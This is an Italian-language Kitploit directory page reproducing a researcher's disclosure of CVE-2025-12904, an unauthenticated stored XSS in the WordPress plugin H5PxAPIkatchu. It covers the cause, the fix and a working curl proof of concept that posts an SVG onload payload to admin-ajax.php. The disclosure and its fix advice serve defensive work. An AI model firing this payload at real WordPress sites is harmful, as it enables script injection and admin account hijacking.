Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
SNORDIAN-s-H5PxAPIkatchu-CVE-Report — Divulgazione per CVE-2025-12904 | Kitploit
Strumenti/GitHubGitHub/mooseloveti/snordian-s-h5pxapikatchu-cve-report
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubmooseloveti/snordian-s-h5pxapikatchu-cve-report

SNORDIAN-s-H5PxAPIkatchu-CVE-Report

Divulgazione per CVE-2025-12904

Vedi Repository
8 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

SNORDIAN's-H5PxAPIkatchu-CVE-Report

Divulgazione per CVE-2025-12904

CVE-2025-12904 - Vulnerabilità in SNORDIAN's H5PxAPIkatchu

Questo repository divulga una vulnerabilità scoperta in SNORDIAN's H5PxAPIkatchu <= 0.4.16,WordPress plugin sviluppato da otacke.

🛠 Versione Affetta

  • Prodotto: SNORDIAN's H5PxAPIkatchu
  • Versione: v0.4.16
  • URL: https://wordpress.org/plugins/h5pxapikatchu/

🔒 CVE Assegnata

CVE IDTipoComponenteImpatto
CVE-2025-12904Cross-Site Scripting Memorizzato Non Autenticato tramite insert_dataclass-table-view.phpL'attaccante autenticato può eseguire JS

🧾 Descrizione Dettagliata

CVE-2025-12904 — Cross-Site Scripting Memorizzato Non Autenticato tramite insert_data

  • Componente Affetto: pagina admin di h5pxapikatchu
  • Vettore di Attacco: Non autenticato tramite richiesta POST
  • Trigger: Un attaccante può iniettare script dannosi nell'interfaccia admin sfruttando l'azione insert_data per memorizzare script arbitrari.
root@kitploit:~
curl -i -X POST 'http://localhost:8080/wp-admin/admin-ajax.php' \
  --data-urlencode 'action=insert_data' \
  --data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

※Se l'id all'interno dell'oggetto non esiste, fallirà.

  • Impatto: Gli script memorizzati possono essere eseguiti, comportando il rischio di danni gravi come il dirottamento dell'account.

❓Motivo della vulnerabilità

La funzione insert_data() non effettuava alcun controllo dei permessi, permettendo di salvare input dannosi senza autenticazione. Inoltre, queste voci venivano visualizzate senza escape nell'interfaccia di amministrazione.

  • La funzione insert_data() usa current_user_can per prevenire l'esecuzione non autorizzata.
  • Usando esc_html($value) invece di echo $value, è possibile prevenire l'esecuzione di XSS.

Un commento

È stato molto difficile creare il PoC.

root@kitploit:~
--data-urlencode 'xapi={
    "object":{"id":"http://localhost:8080/?id=2"},
    "result":{"response":"<svg onload=alert(1)>"}
  }'

Ho passato molto tempo a riprodurre questa parte. Vorrei diventare più abile con il comando curl. E poi questo plugin... va tutto bene? Soprattutto, il nome, ecc.

🔍 Scopritore

Nome: MooseLove
Ruolo: Ricercatore di sicurezza indipendente / cacciatore di bug
Contatto: Disponibile su richiesta


📚 Riferimenti

  • Prodotto: https://wordpress.org/plugins/h5pxapikatchu/

⚠️ Licenza

Questa segnalazione è fornita per la consapevolezza pubblica sulla sicurezza. Libera da condividere con attribuzione.

Scarica lo strumento